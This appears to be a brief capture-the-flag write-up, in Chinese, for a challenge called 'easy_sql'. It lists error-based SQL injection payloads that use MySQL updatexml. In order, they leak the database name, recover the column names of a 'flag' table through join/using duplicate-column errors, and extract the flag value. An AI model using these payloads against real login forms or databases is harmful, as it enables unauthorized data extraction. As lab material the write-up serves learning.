easy_sql

无列名报错注入,猜了个flag表

# 数据库
admin') or updatexml(1,concat(0x7e,(select database()),0x7e),1);#
# 字段名
admin') or updatexml(1,concat(0x7e,(select * from (select * from security.flag as a join flag b)c),0x7e),1);#
admin') or updatexml(1,concat(0x7e,(select * from (select * from security.flag as a join flag b using(id))c),0x7e),1);#
admin') or updatexml(1,concat(0x7e,(select * from (select * from security.flag as a join flag b using(id, no))c),0x7e),1);#
# 字段内容
admin') or updatexml(1,concat(0x7e,((select `515cfb55-44dc-4022-a06e-99fdfc64d691` from security.flag)),0x7e),1);#
admin') or updatexml(1,concat(0x7e,right((select `515cfb55-44dc-4022-a06e-99fdfc64d691` from security.flag), 30),0x7e),1);#

Last updated